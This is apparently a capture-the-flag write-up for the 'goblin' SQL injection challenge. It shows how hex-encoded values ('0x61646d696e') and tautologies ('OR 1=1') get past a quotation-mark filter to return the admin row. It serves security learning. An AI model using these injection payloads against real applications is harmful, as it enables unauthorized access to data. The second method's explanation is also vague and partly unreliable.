Skip to main content

goblin

1

We are provided with the SQL query:

SELECT id FROM prob_goblin WHERE id='guest' AND no={$_GET[no]}

This time the application blocks quotation marks. It also does not directly insert user input into the id field.

The code also performs two conditional checks:

  1. if($result['id']): It checks if the statement is True. If yes, it prints the following message: Hello {$result[id]}.
  2. if($result['id'] == 'admin'): It then checks if the id is set to admin. If yes, it prints the flag.

We want the second conditional statement to be executed.

There are two methods.

Method 1

In order to make the result of the first query False, we can provide the following URI parameter:

?no=0

The resultant query then becomes:

SELECT id FROM prob_goblin WHERE id='guest' AND no=0

Since no=0 is always false, the result of the AND operation will always be False.

2

As expected, the Hello {$result[id]} message isn't printed.

In order to execute the second conditional statement, we can provide the following URI parameter:

?no=0 OR id=0x61646d696e

We are providing the Hexadecimal representation of the admin string.

The resultant query will be:

SELECT id FROM prob_goblin WHERE id='guest' AND no=0 OR id=0x61646d696e

The result of the first conditional is already False and because we just the id field to admin, the flag will be printed.

3

Method 2

If we provide the following URI parameter:

?no=no

The resultant query will be:

SELECT id FROM prob_goblin WHERE id='guest' AND no=no

The result will always be True since any column (no) compared with itself is always true.

Next, if we add an OR command as follows:

?no=no OR 1=1 ORDER BY id;

The resultant query will be:

SELECT id FROM prob_goblin WHERE id='guest' AND no=no OR 1=1 ORDER BY id;

This will print out all the rows as 1=1 is always true and anything OR with true is true.

4